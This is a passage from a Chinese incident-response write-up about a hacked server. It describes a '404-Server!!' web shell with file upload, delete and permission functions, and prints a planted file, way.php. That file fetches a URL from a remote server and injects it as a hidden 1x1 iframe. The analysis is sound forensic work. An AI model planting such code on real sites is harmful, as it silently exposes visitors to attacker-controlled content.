惨遭黑客入侵，记一次服务器被攻击的应急行动！(7)

然而，谷歌搜索结果显示，这段代码与 404-server 有关联! !上传 Shell 并出现在相同的受损服务器上。因此，如果你在服务器上发现了这个代码，它可能是一个被攻击的标识，你应该进一步检查。

检查“404-Server!!”源代码使我得出结论，黑客提供了一个文件浏览器，它具有上传、查看和删除文件以及调整权限的功能。

通过检查这些文件的背后组织和开发者，我发现它们都是由PHP进程的所有者创建的，因此它们非常像 PHP 应用程序所创建的。

另一个被攻击的文件叫做 way.php，它只是包含了来自另一个服务器的文件：

1. <?php

2. $way = 'http://XXX.XXX.XXX.XXX/dir/index.php?52b019b=l3SKfPrfJxjFGMeDebmtF_FXPAzaHkyZxYufiaWSHJmkaWD8jvT5Sknh_QTIT1XW_r4';

3. $fd = @file($way);

4. if ($fd !== false)

5. if (isset($fd[0]))

6. echo(' <iframe src="'.$fd[0].'" width="1" height="1" ></iframe> ');

7. ?>

（编辑：ASP站长网）